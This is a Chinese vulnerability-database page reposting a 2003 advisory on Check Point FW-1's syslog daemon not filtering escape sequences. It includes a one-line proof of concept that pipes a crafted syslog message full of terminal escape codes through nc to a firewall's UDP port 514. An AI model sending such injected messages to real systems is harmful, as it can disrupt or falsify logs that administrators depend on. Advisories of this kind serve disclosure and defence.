Check Point FW-1 Syslog Daemon – Unfiltered Escape Sequence

Check Point FW-1 Syslog Daemon – Unfiltered Escape Sequence

漏洞ID 1053779 漏洞类型
发布时间 2003-03-21 更新时间 2003-03-21
图片[1]-Check Point FW-1 Syslog Daemon – Unfiltered Escape Sequence-安全小百科CVE编号 N/A
图片[2]-Check Point FW-1 Syslog Daemon – Unfiltered Escape Sequence-安全小百科CNNVD-ID N/A
漏洞平台 Hardware CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/22394
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/7161/info

An issue has been discovered in Check Point FW-1 syslog daemon when attempting to process a malicious, remotely supplied, syslog message. Specifically, some messages containing escape sequences are not properly filtered out. This may result in unpredictable behaviour by the Check Point syslog daemon.

The technical details regarding this issue are currently unknown. This BID will be updated when further information becomes available.

[attacker]# echo -e "<189>19: 00:01:04:
Testa33[2J33[2;5m33[1;31mHACKER~
ATTACK33[2;25m33[22;30m33[3q" | nc -u firewall 514

相关推荐: Sun Chili!Soft权限许可和访问控制漏洞

Sun Chili!Soft权限许可和访问控制漏洞 漏洞ID 1205417 漏洞类型 未知 发布时间 2001-08-22 更新时间 2001-08-22 CVE编号 CVE-2001-0632 CNNVD-ID CNNVD-200108-128 漏洞平台 …

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享